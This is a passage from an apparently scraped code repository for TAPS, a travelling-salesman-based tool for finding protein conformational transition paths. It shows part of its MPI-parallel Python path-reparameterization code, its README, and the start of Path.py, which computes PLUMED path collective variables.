1] + 1)\n\t\t\t\tprint(\"WHOLEMOLECULES STRIDE=1 ENTITY0=%s\" % atoms, file=f)\n\t\t\t\tprint(\"rmsd: RMSD REFERENCE=target.pdb TYPE=OPTIMAL\", file=f)\n\t\t\t\tprint(\"restraint: ...\", file=f)\n\t\t\t\tprint(\"MOVINGRESTRAINT\", file=f)\n\t\t\t\tprint(\" ARG=rmsd\", file=f)\n\t\t\t\tprint(\" AT0=0 STEP0=0 KAPPA0=0\", file=f)\n\t\t\t\t# length of targeted MD\n\t\t\t\tnumSteps = int(self.lenTMD / self.timeStep / 2)\n\t\t\t\tprint(\" AT1=0 STEP1=%d KAPPA1=%d\" % (numSteps,self.kTMD), file=f)\n\t\t\t\tprint(\" AT2=0 STEP2=%d KAPPA2=%d\" % (numSteps*2,self.kTMD), file=f)\n\t\t\t\tprint(\"...\", file=f)\n\t\t\t\tprint(\"PRINT ARG=rmsd STRIDE=\" + str(self.freqTRJ) + \" FILE=\" + self.cvOut + \" FMT=%8.16f\", file=f)\n\t\t\t\tf.close()\n\n\n\t# ==================================================================================================================\n\t# perform tmd sampling\n\t# ==================================================================================================================\n\tdef tmd_sample(self, dirMeta, dirTMD):\n\t\tN_jobs = len(dirTMD) # the total number of trajectories to run\n\t\tfor itr in range(0, int(N_jobs / size) + 1):\n\t\t\ttid = itr * size + rank\n\t\t\tif tid < N_jobs:\n\t\t\t\trunDir = self.dirRoot + '/' + dirMeta + '/' + dirTMD[tid]\n\t\t\t\t#print(\"+++DEBUG+++ Running TMD\", tid, \"of\", N_jobs, \", size\", size, \", rank\", rank, \"iter,\", itr)\n\t\t\t\trunTMD(dire=runDir, engine=self.engine, runName=self.runName, pluName=self.pluName, trjName=self.trjName)\n\n\n\t# ==================================================================================================================\n\t# Analyze metaD trajectories to update path\n\t# 1. filter metaD trajectories\n\t# select only frames whose restraining potential on PCV-s and wall potenial on PCV-z are within tolerance\n\t# This helps remove frames with high restraining or wall potential that may be \"\"unphysical\".\n\t# 2. select median(z) from filtered data, find geometric centroid of the median(z) conformations in each metaD\n\t# NOTE: pre-process median(z) conformations for clustering (TODO: to be removed in future versions)\n\t# 3. reorder median(z) nodes via concorde (Travelling-salesman solver, implemented in C++)\n\t# 4. 
path reparameterization (truncate at terminal nodes and insert conformations between distant neighbor nodes)\n\t# ==================================================================================================================\n\tdef meta_analyze(self, dirMeta, dirSamples): #, NumNode, IndProc):\n\n\t\tif rank == 0:\n\t\t\tprint(\"+++TAPS+++ Filtering metaD trajectories: restraining potential must not exceed \", self.rsTol)\n\t\t\tprint(\"+++TAPS+++ Finding median(z) conformations\")\n\t\t\tt0 = time.time()\n\n\t\tcomm.Barrier()\n\t\t\t\n\t\ttotTRJ = len(dirSamples) # the total number of trajectories sampled\n\t\tN_jobs = totTRJ\n\t\tfor itr in range(0, int(N_jobs / size) + 1):\n\t\t\ttid = itr * size + rank\n\t\t\tif tid < N_jobs:\n\t\t\t\ttrjDir = self.dirRoot + '/' + dirMeta + '/' + dirSamples[tid]\n\t\t\t\t#print(\"+++DEBUG+++ find med(z) in \", dirSamples[tid], tid, \"of\", N_jobs, \", size\", size, \", rank\", rank, \"iter\", itr)\n\t\t\t\tmeta = md.load(trjDir + '/' + self.trjName, top=self.topFile) \n\t\t\t\t# colvar_filter is generated after sampling\n\t\t\t\tcvs = np.loadtxt(trjDir + '/colvar_filter', dtype=float)\n\t\t\t\tz = cvs[:, 2] # third column is pcv-z\n\t\t\t\trsPol = cvs[:, 4] # fifth column is the value of the restraining potential\n\t\t\t\tzwPol = cvs[:, 5] # sixth column is the value of the wall potential on pcv-z\n\t\t\t\twith np.errstate(invalid='ignore'):\n\t\t\t\t\tcuts = np.where((rsPol >= self.rsTol) | (zwPol >= self.rsTol))[0]\n\t\t\t\tif len(cuts) > 0:\n\t\t\t\t\tcut = cuts[0]\n\t\t\t\t\tif cut < meta.n_frames:\n\t\t\t\t\t z_filter = z[0:cut]\n\t\t\t\t\telse:\n\t\t\t\t\t z_filter = z[0:meta.n_frames]\n\t\t\t\telse:\n\t\t\t\t\tcut = meta.n_frames\n\t\t\t\t\tz_filter = z[0:meta.n_frames]\n\t\t\t\tranz = np.absolute(np.max(z_filter) - np.min(z_filter)) / 10.0\n\t\t\t\t# =============================================================================================\n\t\t\t\t# find median(z) conformations from filtered trajectories\n\t\t\t\t# NOTE: median(z) values given by 'numpy.median(z_filter)' is not an element of the array 'z_filter'\n\t\t\t\t# NOTE: This causes troubles when z is unevenly distributed in the array 'z_filter'\n\t\t\t\t# NOTE: Therefore, we use an straightforward implementation for median(z) as the following:\n\t\t\t\t# =============================================================================================\n\t\t\t\tmedz = np.sort(z_filter)[len(z_filter) // 2]\n\t\t\t\tind_medz = np.where(np.absolute(z_filter - medz) < ranz)[0]\n\n\t\t\t\t# =============================================================================================\n\t\t\t\t# extract median(z) confs\n\t\t\t\t# =============================================================================================\n\t\t\t\tconf_medz = meta.slice(ind_medz)\n\t\t\t\tgc = Confs.traj2conf(conf_medz).geoCentroid(self.pcvInd)\n\t\t\t\tgc.save(trjDir+'/gc_medz.xtc')\n\t\t\t\t# =============================================================================================\n\t\t\t\t# extract \"physical\" conformations from as input for path re-parameterization\n\t\t\t\t# =============================================================================================\n\t\t\t\tind_filter = np.array(range(cut))\n\t\t\t\tfiltTRJ = meta.slice(ind_filter)\n\t\t\t\tfiltTRJ.save(trjDir + '/' + self.trjFilter) \n\t\t\t\t#print(\"+++DEBUG+++ Filtered conformations stored in \", dirSamples[tid], tid, \"of\", N_jobs, \", size\", size, \", rank\", rank, \"iter\", itr)\n\n\t\tcomm.Barrier()\n\n\t\tif rank == 
0:\n\t\t\t# =====================================================================================================\n\t\t\t# store medz centroids per metaD trajectory\n\t\t\t# =====================================================================================================\n\t\t\tprint(\"+++TAPS+++ Storing median(z) nodes of this iteration\")\n\t\t\tlist_medz = []\n\t\t\tfor i in range(totTRJ):\n\t\t\t\ttrjDir = self.dirRoot + '/' + dirMeta + '/' + dirSamples[i]\n\t\t\t\t#print(\"+++DEBUG+++ trjDir:\", trjDir) \n\t\t\t\tlist_medz.append(Confs.traj2conf(md.load(trjDir+'/gc_medz.xtc',top=self.topFile)))\n\t\t\t\t#print(\"+++DEBUG+++ Loaded: gc_med.xtc in \", trjDir)\n\t\t\tmz = Confs.merge(list_medz)\n\t\t\tpmz = Path('mz_tsp', self.pcvInd, mz, dirSamples)\n\t\t\tpmz.nodes.save(self.dirRoot + '/' + dirMeta + '/mz.xtc')\n\t\t\t# DEBUG pmz = Path('mz_tsp', self.pcvInd, Confs.traj2conf(md.load(self.dirRoot + '/' + dirMeta + '/mz.xtc', top=self.topFile)), dirSamples)\n\n\t\t\tt1 = time.time()\n\t\t\tprint(\"+++TAPS+++ Finding med(z) took \", t1 - t0, ' sec')\n \n\t\t\t# =====================================================================================================\n\t\t\t# Travelling-salesman reordering\n\t\t\t# ===================================================================================================== \n\t\t\tpmz.reOrder(dire=self.dirRoot + '/' + dirMeta)\n\t\t\tpmz.exportPath(self.dirRoot + '/' + dirMeta)\n\n\t\t\t# =====================================================================================================\n\t\t\t# path re-parameterization, step 1. truncation\n\t\t\t# In practise, this is done by removing tails and add the original two terminal nodes in two ends\t\t\t\n\t\t\t# =====================================================================================================\n\t\t\tprint(\"+++TAPS+++ Truncating path: remove segments beyond the two fixed ends\")\n\n\t\t\tt0 = time.time()\n\n\t\t\tp_trunc = pmz.truncate(self.initNode, self.finalNode)\n\t\t\tp_trunc.exportPath(self.dirRoot + '/' + dirMeta)\n\n\t\t\tt1 = time.time()\n\t\t\tprint(\"+++TAPS+++ Truncation took \", t1 - t0, ' sec')\n\n\t\t\t# =====================================================================================================\n\t\t\t# path re-parameterization, step 2. increase tolDist*=2 shortcut the path\n\t\t\t# =====================================================================================================\n\t\t\tprint(\"+++TAPS+++ Straightening path:\")\n\t\t\tprint(\"+++TAPS+++ [a] Short-cutting path by \", self.tolDist, \" x \", self.stf)\n\n\t\t\tt0 = time.time()\n\n\t\t\tp_rc = p_trunc.rmClose(self.tolDist * self.stf)\n\t\t\tp_rc.pathName = \"mz_tsp_rc\"\n\t\t\tp_rc.exportPath(self.dirRoot + '/' + dirMeta)\n\n\t\t\tt1 = time.time()\n\t\t\tprint(\"+++TAPS+++ time-cost:\", t1 - t0, ' sec')\n\t\t\t# =====================================================================================================\n\t\t\t# path re-parameterization, step 3. 
insert conformation between distant neighbor nodes\n\t\t\t# =====================================================================================================\n\t\t\t# For inserting comformations between distant nodes\n\t\t\t# filtered samples of both the current and last round should be used as candidates\n\t\t\t# this is to ensure that there are always sufficient input conformations for path reparameterization\n\t\t\t# and avoids the path to be broken ( which allows a larger zwall and quicker convergence)\n\t\t\t# as long as the first rounds gives connected path, this strategy should work fine,\n\t\t\t# because although this round has broken path, once conformations are inserted from previous round\n\t\t\t# sampling of next round will definitely include connecting conformations\n\t\t\t# It is also possible to store all sampled data for path-reparameterization, but this is too memory-consuming\n\t\t\t# =====================================================================================================\n\n\t\t\tprint(\"+++TAPS+++ [b] Re-inserting MetaD conformation into straightened path\")\n\n\t\t\t# only use the trajectores in-between distant pairs for insertion, reducing costs \n\t\t\t(listFar, dirFar, segInd, farInSeg) = p_rc.distantNeighbors(tolDist=self.tolDist, doPBC=False)\n\t\t\t#print(\"+++DEBUG+++ dirFar=\", dirFar)\n\t\t\t#print(\"+++DEBUG+++ segInd=\", segInd)\n\t\t\t#print(\"+++DEBUG+++ farInSeg=\", farInSeg) \n\t\t\t# cut path into segments, for parallelization of insertion \n\t\t\tpSeg=[]\n\t\t\tfor i in range(len(segInd)):\n\t\t\t\t#print(\"+++DEBUG+++ \", i,segInd[i],j,farInSeg[j])\n\t\t\t\tpSeg.append(p_rc.pSlice(segInd[i]))\n\t\t\t\tif i not in farInSeg:\n\t\t\t\t\tsegTRJ = self.dirRoot + '/' + dirMeta + '/seg' + str(i) +'.xtc'\n\t\t\t\t\t#print(\"+++DEBUG+++ \",i,segTRJ) \n\t\t\t\t\tpSeg[i].nodes.save(segTRJ)\n\t\t\t\t\t#print(\"+++DEBUG+++ \",segTRJ)\n \n\t\t\t# decide which trajectories to use for insertion\n\t\t\t# extracting node (traj) index from dir, which are the last 3 letters\n\t\t\tdirHead = dirSamples[0][0:(len(dirSamples[0])-3)]\n \n\t\t\tdataFar = []\n\t\t\tfor i in range(len(dirFar)):\n\t\t\t\tstr1 = dirFar[i][0]\n\t\t\t\tstr2 = dirFar[i][1]\n\t\t\t\ti1 = int(str1[(len(str1)-3):len(str1)])\n\t\t\t\ti2 = int(str2[(len(str2)-3):len(str2)]) \n\t\t\t\tif i1 < i2:\n\t\t\t\t\ttmp = list(range(i1,(i2+1)))\n\t\t\t\telif i1 == i2:\n\t\t\t\t\ttmp = [i1] \n\t\t\t\telse:\n\t\t\t\t\ttmp = list(range(i2,(i1+1)))\n\t\t\t\tfor j in range(len(tmp)):\n\t\t\t\t\ttmp[j] = dirHead + digits(tmp[j])\n\t\t\t\tdataFar.append(tmp)\n\t\t\t#print(\"+++DEBUG+++ dataFar=\", dataFar)\n\t\telse:\n\t\t\tpSeg=None\n\t\t\tdataFar=None\n\t\t\tfarInSeg=None\n\t\n\t\tpSeg = comm.bcast(pSeg, root=main_rank)\n\t\tdataFar = comm.bcast(dataFar, root=main_rank)\n\t\tfarInSeg = comm.bcast(farInSeg, root=main_rank)\n\n\t\t# trajctory directories are stored in dataFar[][]\n\t\tN_jobs=len(farInSeg)\n\t\tfor itr in range(0, int(N_jobs / size) + 1):\t# Make sure all the tasks assigned evenly to the nodes #\n\t\t\ttid = itr * size + rank\n\t\t\tif tid < N_jobs:\n\t\t\t\t#t0 = time.time()\n\t\t\t\ttrjDIR = self.dirRoot + '/' + dirMeta + '/' + dataFar[tid][0] + '/' + self.trjFilter\n\t\t\t\tdata= md.load(trjDIR, top=self.topFile)\n\t\t\t\tfor j in range(1,len(dataFar[tid])):\n\t\t\t\t\ttrjDIR = self.dirRoot + '/' + dirMeta + '/' + dataFar[tid][j] + '/' + self.trjFilter\n\t\t\t\t\t#print(\"+++DEBUG+++ \", trjDIR)\n\t\t\t\t\tdata = data.join(md.load(trjDIR, top=self.topFile)) \n\t\t\t\t#t1 = 
time.time()\n\t\t\t\tifar = farInSeg[tid]\n\t\t\t\t#print(\"+++DEBUG+++ Loading & Merging of \" + str(dataFar[tid]) + \" samples for Segment\" + str(ifar) + \" took \" + str(t1-t0) + ' sec')\n\t\t\t\tp = pSeg[ifar].insert(Confs.traj2conf(data), None, self.tolDist, self.devMID, self.tolCos)\n\t\t\t\tsegXTC = self.dirRoot + '/' + dirMeta + '/seg'+ str(ifar) + '.xtc'\n\t\t\t\tp.nodes.save(segXTC)\n\t\t\t\t#t2 = time.time()\n\t\t\t\t#print(\"+++DEBUG+++ Insertion for Segment\" + str(ifar) + \" with \" + str(dataFar[tid]) + \" samples took \" + str(t2-t1) + ' sec')\n\t\t#mpi4py barrier#\n\t\t\n\t\tif rank==0:\n\t\t\t# re-merge different segments\n\t\t\tnSeg = len(segInd)\n\t\t\tsegs = [] \n\t\t\tfor i in range(nSeg-1):\n\t\t\t\tsegXTC = self.dirRoot + '/' + dirMeta + '/seg'+ str(i) +'.xtc'\n\t\t\t\ttrjSeg = md.load(segXTC,top=self.topFile)\n\t\t\t\t#print(\"+++DEBUG+++ Loaded \", segXTC, \"for merging\")\n\t\t\t\t# remove repetitive nodes\n\t\t\t\tif segInd[i][len(segInd[i])-1] == segInd[i+1][0]:\n\t\t\t\t\ttrjSeg = trjSeg.slice(np.arange(trjSeg.n_frames-1))\n\t\t\t\tsegs.append(Confs.traj2conf(trjSeg))\n\t\t\tsegXTC = self.dirRoot + '/' + dirMeta + '/seg'+ str(nSeg-1) +'.xtc'\n\t\t\ttrjSeg = md.load(segXTC,top=self.topFile)\n\t\t\tsegs.append(Confs.traj2conf(trjSeg))\n\t\t\tmerged = Confs.merge(segs)\n\t\t\t#print(\"+++DEBUG+++ Segments merged\")\n\t\t\tp_in = Path('mz_tsp_rc_in', self.pcvInd, merged)\n\t\t\tp_in.exportPath(self.dirRoot + '/' + dirMeta) \n\t\t\t#print(\"+++DEBUG+++ Inserted path generated\")\t\t\t\n\t\t\t# clean up temporary segXXX.xtc files\n\t\t\tfor f in glob.glob(self.dirRoot + '/' + dirMeta + \"/seg*.xtc\"):\n\t\t\t\tos.remove(f)\n\t\t\tt2 = time.time()\n\t\t\tprint(\"+++TAPS+++ time-cost:\", t2 - t1, ' sec')\n\t\t\t#print(\"+++DEBUG+++ p_in.oriDIR=\",p_in.oriDIR)\n\t\t# ==============================================================================================================\n\t\t# path re-parameterization, step 4. 
if there are still distant neighbor nodes, extra targeted MD is performed\n\t\t# ==============================================================================================================\t\t\t\n\t\t\t(listFar, dirFar, segInd, farInSeg) = p_in.distantNeighbors(tolDist=self.tolDist, doPBC=False)\n\t\telse:\n\t\t\tlistFar = None\n\t\t\tsegInd = None\n\t\t\tfarInSeg = None\n \n\t\tlistFar = comm.bcast(listFar, root=main_rank)\n\t\tsegInd = comm.bcast(segInd, root=main_rank)\n\t\tfarInSeg = comm.bcast(farInSeg, root=main_rank)\n\n\t\tif len(listFar) > 0:\n\t\t\tif rank == 0:\n\t\t\t\tprint("+++TAPS+++ Distant nodes are still present\\n+++TAPS+++ Perform targeted MD for reparameterization.")\n\t\t\t\tt0 = time.time()\n\t\t\t\tdirTMDs = self.tmd_dirs(listFar, dirMeta)\n\t\t\telse:\n\t\t\t\tdirTMDs = None\n\t\t\t\n\t\t\tcomm.Barrier()\n\t\t\tdirTMDs = comm.bcast(dirTMDs, root=main_rank)\n\n\t\t\tif rank == 0:\n\t\t\t\tt1 = time.time()\n\t\t\t\tprint("+++TAPS+++ tMD preparation finished (time-cost:", t1-t0, "sec)")\n\n\t\t\tcomm.Barrier()\n\t\t\tself.tmd_sample(dirMeta, dirTMDs)\n\t\t\tcomm.Barrier()\n\n\t\t\t# put all segments and tmd trajectories together \n\t\t\tif rank == 0:\n\t\t\t\tt2 = time.time()\n\t\t\t\tprint("+++TAPS+++ tMD sampling finished (time-cost:", t2-t1, "sec)")\n\t\t\t\t# cut path into segments\n\t\t\t\t#print("+++DEBUG+++ segInd=", segInd)\n\t\t\t\tpSeg=[]\n\t\t\t\tfor i in range(len(segInd)):\t\t\t\t\t\n\t\t\t\t\tpSeg.append(p_in.pSlice(segInd[i]))\n\t\t\t\t\tif i not in farInSeg:\n\t\t\t\t\t segTRJ = self.dirRoot + '/' + dirMeta + '/tmd4repar/seg' + str(i) +'.xtc'\n\t\t\t\t\t #print("+++DEBUG+++ ", segTRJ)\n\t\t\t\t\t pSeg[i].nodes.save(segTRJ) \n\t\t\telse:\n\t\t\t\tpSeg=None\n\t\t\tcomm.Barrier()\n\t\t\tpSeg = comm.bcast(pSeg, root=0)\n\t\t\tcomm.Barrier()\n\n\t\t\t# replace far segments by short-cut tmd traj\n\t\t\tN_jobs=len(dirTMDs)\n\t\t\tfor itr in range(0, int(N_jobs / size) + 1):\t# Make sure all the tasks assigned evenly to the nodes #\n\t\t\t\ttid = itr * size + rank\n\t\t\t\tif tid < N_jobs:\n\t\t\t\t\ttrjDIR = self.dirRoot + '/' + dirMeta + '/' + dirTMDs[tid] + '/' + self.trjName\n\t\t\t\t\tt0 = time.time()\n\t\t\t\t\tdata= md.load(trjDIR, top=self.topFile)\n\t\t\t\t\tifar = farInSeg[tid]\n\t\t\t\t\tp = pSeg[ifar].insert(Confs.traj2conf(data), None, self.tolDist, self.devMID, self.tolCos)\n\t\t\t\t\tt1 = time.time()\n\t\t\t\t\t#print("+++DEBUG+++ Insertion for Segment" + str(ifar) + " with " + dirTMDs[tid] + " samples took " + str(t1-t0) + ' sec')\n\t\t\t\t\tsegTRJ = self.dirRoot + '/' + dirMeta + '/tmd4repar/seg' + str(ifar) + '.xtc'\n\t\t\t\t\tp.nodes.save(segTRJ)\n\n\t\t\tcomm.Barrier()\n\n\t\t\tif rank == 0:\n\t\t\t\tnSeg = len(segInd)\n\t\t\t\tsegs = [] \n\t\t\t\tfor i in range(nSeg-1):\n\t\t\t\t\tsegXTC = self.dirRoot + '/' + dirMeta + '/tmd4repar/seg'+ str(i) +'.xtc'\n\t\t\t\t\ttrjSeg = md.load(segXTC,top=self.topFile)\n\t\t\t\t\t#print("+++DEBUG+++ Loaded ", segXTC, "(", trjSeg.n_frames, "frames)")\n\t\t\t\t\t# remove repetitive nodes\n\t\t\t\t\tif segInd[i][len(segInd[i])-1] == segInd[i+1][0]:\n\t\t\t\t\t trjSeg = trjSeg.slice(np.arange(trjSeg.n_frames-1))\n\t\t\t\t\tsegs.append(Confs.traj2conf(trjSeg))\n\t\t\t\tsegXTC = self.dirRoot + '/' + dirMeta + '/tmd4repar/seg'+ str(nSeg-1) +'.xtc'\n\t\t\t\ttrjSeg = md.load(segXTC,top=self.topFile)\n\t\t\t\t# the last segment must also be kept (mirrors the analogous merge in step 3 above)\n\t\t\t\tsegs.append(Confs.traj2conf(trjSeg))\n\n\t\t\t\t# re-merge different segments\n\t\t\t\tp_tmd = Path("mz_tsp_tmd", self.pcvInd, Confs.merge(segs))\n\t\t\t\tp_tmd.exportPath(self.dirRoot + '/' + 
dirMeta)\n\n\t\t\t\t# clean up temporary segXXX.xtc files\n\t\t\t\tfor f in glob.glob(self.dirRoot + '/' + dirMeta + \"/tmd4repar/seg*.xtc\"):\n\t\t\t\t os.remove(f)\n\n\t\t\telse:\n\t\t\t\tp_tmd = None \n\t\telse:\n\t\t\tif rank == main_rank:\n\t\t\t\tp_tmd = p_in\n\t\t\telse:\n\t\t\t\tp_tmd = None\n\n\t\t#mpi4py barrier#\n\t\t# ===================================================================================================\n\t\t# path re-parameterization, step 5. use tolDist to shortcut the path\n\t\t# ===================================================================================================\n\t\tif rank == 0:\n\t\t\tp_next = p_tmd.rmClose(self.tolDist)\n\t\t\tp_next.exportPath(self.dirRoot + '/' + dirMeta)\n\t\t\tprint('+++TAPS+++ Path-reparameterization finished')\n\t\telse:\n\t\t\tp_next = None\n\n\t\t#mpi4py barrier#\n\n\t\treturn p_next\n"
},
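The fragment above repeatedly distributes independent jobs across MPI ranks with the round-robin index `tid = itr * size + rank`, synchronizing with barriers in between. A minimal, self-contained sketch of that pattern; the `do_job` function and the `N_jobs` value are illustrative stand-ins, not part of TAPS:

```python
# Round-robin MPI task assignment as used throughout TAPS (tid = itr * size + rank).
# Requires mpi4py; run e.g. with: mpirun -np 4 python sketch.py
from mpi4py import MPI

comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()

def do_job(tid):
    # stand-in for loading one tMD trajectory and inserting it into a path segment
    print("rank", rank, "handles job", tid)

N_jobs = 10
for itr in range(0, int(N_jobs / size) + 1):
    tid = itr * size + rank      # each rank takes every size-th job
    if tid < N_jobs:
        do_job(tid)
comm.Barrier()                   # the source marks these sync points as '#mpi4py barrier#'
```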
{
"alpha_fraction": 0.6425505876541138,
"alphanum_fraction": 0.6781116127967834,
"avg_line_length": 25.73770523071289,
"blob_id": "d3caeb0a6aa0a2b07e156b7cc5f7fcdef9f56447",
"content_id": "0a3b480dc47c95a23e66e84cb30024899801c13e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1631,
"license_type": "no_license",
"max_line_length": 218,
"num_lines": 61,
"path": "/README.md",
"repo_name": "xikun2020/TAPS",
"src_encoding": "UTF-8",
"text": "TAPS released in 2020 (Travelling-salesman based Automatic Path-Searching)\n===\nRequirements\n==\n * GROMACS >=2019.4\n * Plumed >=2.7\n * Cuda >=10.2\n * Openmpi >=4.0.2\n * python >=3.7.4 \n * numpy >=1.17.2\n * MDTraj >=1.9.3\n * GromacsWrapper >=0.8.0\n * mpi4py >=3.0.3\n * [concorde](http://www.math.uwaterloo.ca/tsp/concorde.html) :\n * These requirements were tested and proved to work. Feel free to test\n\nInstall Python and Python Packages\n==\nWe highly recommend that you download the Python 3.x version of Anaconda, which is a completely free enterprise-ready Python distribution for large-scale data processing, predictive analytics, and scientific computing.\n\nDesign and Usage\n==\nTravelling-salesman based Automatic Path-Searching (TAPS)\n===\n * No static coordinate space (CVs): ordered high dimensional conformations\n * Perpendicular relaxation: Quickly find MFEP segments\n * Automatic re-order of path nodes by Travelling-salesman\n * Enhanced sampling along path on PCV-s by MetaD\n * Validated for three protein systems (76-303 residues and total 30000-80000 atoms, [TAPStest](https://pubs.acs.org/journal/jctcce)) \n \nTutorial\n==\n 1. The parameters used for TAPS can be modified in pars/taps.par file\n 2. Serial Running:\n```\n 1. Change runMode to \"serial\" in taps.par\n 2. > python runTAPS.py \n```\n 3. Parallel Running:\n```\n 1. Change runMode to \"Parallel\" in taps.par\n 2. > mpirun -np 8 python runTAPS.py \n```\n\nTODO\n=\n\n[ ] Update Tutorial\n\n[ ] Test more\n \nAuthors:\n=\n\nLizhe Zhu: *[email protected]*\n\nKun Xi: *[email protected]*\n\nContributors:\n=\n Maybe you !\n"
},
{
"alpha_fraction": 0.522478461265564,
"alphanum_fraction": 0.5352123379707336,
"avg_line_length": 43.25773239135742,
"blob_id": "c0ed8e441eff9a47c7b47cab856ada554f4b9422",
"content_id": "099ae83d360bdf7c27fe3c187c232c81549a0e0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 25758,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 582,
"path": "/Path.py",
"repo_name": "xikun2020/TAPS",
"src_encoding": "UTF-8",
"text": "#=======================================================================================================================\n# global imports\n#=======================================================================================================================\nfrom __future__ import print_function, division\nimport numpy as np\nimport mdtraj as md\nimport os\nimport re\nfrom Confs import Confs\nfrom copy import deepcopy\nimport glob\n#import time\n\n#=======================================================================================================================\n# global names for plumed command: 'plumed' and 'driver'\n#=======================================================================================================================\n#plu=\"srun --ntasks=1 --hint=nomultithread --ntasks-per-node=1 --ntasks-per-socket=1 --ntasks-per-core=1 --mem_bind=v,local plumed\"\n# TODO: put binary name of 'plumed' as input\nplu = \"plumedx\"\n#plu = \"plumedy\"\ndri = \"drivers\" # TODO: put binary name of 'driver' as input\n\nclass Path(object):\n\t# ==================================================================================================================\n\t# constructor: one input at least - the name of the path\n\t# ==================================================================================================================\n\tdef __init__(self, pName=\"path_node\", pInd = None, nodes = None, ori = []):\n\t\tself.pathName = pName\n\t\tself.pcvInd = deepcopy(pInd)\n\t\tself.nodes = deepcopy(nodes)\n\t\tself.oriDIR = ori # list of string to store the directory where node is from (None if not from sampling)\n\t\tif (pInd is not None) and (nodes is not None):\n\t\t\tself.n_nodes=self.nodes.n_frames\n\t\t\tif len(ori)==main_rank:\n\t\t\t\tself.oriDIR = [None]*self.n_nodes\n\t\telse:\n\t\t\tself.n_nodes = None\n\t\t\tself.lamda = None\n\t\t\tself.pcvs = None\n\n\tdef pcv(self, dire = None, trj = None):\n\t\t# temporary file names\n\t\ttmpCVfile = dire + '/tmpCOLVAR'\n\t\tpluPdbFile = dire + \"/tmpFrames.pdb\"\n\t\tself.nodes.save_plu2(pluPdbFile,self.pcvInd)\n\t\t# if no trajectory is given, compute lamda and sw, etc for self\n\t\tif trj is None:\n\t\t\t# compute lamda\n\t\t\tpluAtoms = self.nodes.atom_slice(self.pcvInd.atomSlice)\n\t\t\t# temporary array to store all neighbor RMSD\n\t\t\tnb = np.zeros(((self.n_nodes-1), 1))\n\t\t\tfor frame in range(0, (self.n_nodes-1)):\n\t\t\t\t# align frames using alignIndex\n\t\t\t\tpluAtoms.superpose(pluAtoms,frame, self.pcvInd.align) # here align and rmsd are both for sliced trajectory\n\t\t\t\t# compute RMSD\n\t\t\t\trms = md.rmsd(pluAtoms, pluAtoms, frame, self.pcvInd.rms)\n\t\t\t\tnb[frame]=rms[(frame+1)]\n\t\t\tavNB2=np.divide(np.sum(np.square(nb)),frame)\n\t\t\tself.lamda=3.2/avNB2\n\n\t\t\t# prepare plumed input file for distance calculation\n\t\t\tpluInput = dire + \"/\" + self.pathName + \".plu\"\n\t\t\tf = open(pluInput, 'w+')\n\t\t\tatoms = ''\n\t\t\tfor i in range(len(self.pcvInd.atomSlice) - 1):\n\t\t\t\tatoms = atoms + str(self.pcvInd.atomSlice[i] + 1) + ','\n\t\t\tatoms = atoms + str(self.pcvInd.atomSlice[len(self.pcvInd.atomSlice) - 1] + 1)\n\t\t\t#print(\"WHOLEMOLECULES STRIDE=1 ENTITY0=%s\" % atoms, file=f)\n\t\t\tprint('p1: PATHMSD REFERENCE=%s LAMBDA=%f NEIGH_STRIDE=4 NEIGH_SIZE=8' % \\\n\t\t\t\t(pluPdbFile, self.lamda), file=f)\n\t\t\tprint('PRINT ARG=p1.sss,p1.zzz STRIDE=1 FILE=%s FMT=%s' % (tmpCVfile, '%8.8f'), file=f)\n\t\t\tf.close()\n\n\t\t\t# write nodes to disk\n\t\t\ttrjFile = dire + 
\"/tmp.xtc\"\n\t\t\tself.nodes.save(trjFile)\n\n\t\t\t# launch plumed for pcv calculation\n\t\t\ttmpOutFile = dire + \"/pluOut.tmp\"\n\t\t\tcmd = plu + \" \" + dri + \" --mf_xtc \" + trjFile + \" --plumed \" + pluInput + \" 1>\" + tmpOutFile + \" 2>\" + tmpOutFile\n\t\t\tos.system(cmd)\n\t\t\t#print('+++DEBUG+++ ', cmd)\n\n\t\t\tfr = open(tmpCVfile, 'r+')\n\t\t\tlines = fr.read()\n\t\t\tfr.close()\n\n\t\t\tfw = open(tmpCVfile, 'w')\n\t\t\t# remove any line that includes '#'\n\t\t\tpdata = re.sub(\"#.*\\n\", \"\", lines)\n\t\t\tprint(pdata, file=fw)\n\t\t\tfw.close()\n\t\t\t# store in self.pcvs\n\t\t\tcvs = np.loadtxt(tmpCVfile, dtype=float)\n\t\t\tself.pcvs = cvs[:, 1]\n\t\t\tself.pcvz = cvs[:, 2]\n\t\t\tos.remove(tmpCVfile)\n\t\t\tos.remove(tmpOutFile)\n\t\t\tos.remove(pluInput)\n\t\t\tos.remove(trjFile)\n\t\t\tos.remove(pluPdbFile)\n\n\t\t# if a trajectory is given, compute the PCV-s and PCV-z of this trajectory\n\t\telse:\n\t\t\tif isinstance(trj,md.Trajectory):\n\t\t\t\t# write md.trajectory to disk\n\t\t\t\ttrjFile = \"tmp.xtc\"\n\t\t\t\ttrj.save(trjFile)\n\n\t\t\t\t# prepare plumed input file for distance calculation\n\t\t\t\tpluInput = self.pathName + \".plu\"\n\t\t\t\tf = open(pluInput, 'w+')\n\t\t\t\tatoms = ''\n\t\t\t\tfor i in range(len(self.pcvInd.atomSlice) - 1):\n\t\t\t\t\tatoms = atoms + str(self.pcvInd.atomSlice[i] + 1) + ','\n\t\t\t\tatoms = atoms + str(self.pcvInd.atomSlice[len(self.pcvInd.atomSlice) - 1] + 1)\n\t\t\t\t#print(\"WHOLEMOLECULES STRIDE=1 ENTITY0=%s\" % atoms, file=f)\n\t\t\t\tprint('p1: PATHMSD REFERENCE=%s LAMBDA=%f NEIGH_STRIDE=4 NEIGH_SIZE=8' % \\\n\t\t\t\t\t(pluPdbFile, self.lamda), file=f)\n\t\t\t\tprint('PRINT ARG=p1.sss,p1.zzz STRIDE=1 FILE=%s FMT=%s' % (tmpCVfile, '%8.8f'), file=f)\n\t\t\t\tf.close()\n\n\t\t\t\t# launch plumed for pcv calculation\n\t\t\t\ttmpOutFile = 'pluOut.tmp'\n\t\t\t\tcmd = plu + \" \" + dri + \" --mf_xtc \" + trjFile + \" --plumed \" + pluInput \\\n\t\t\t\t\t+ \" 1>\" + tmpOutFile + \" 2>\" + tmpOutFile\n\t\t\t\tos.system(cmd)\n\n\t\t\t\t#read plumed output\n\t\t\t\tfr = open(tmpCVfile, 'r+')\n\t\t\t\tlines = 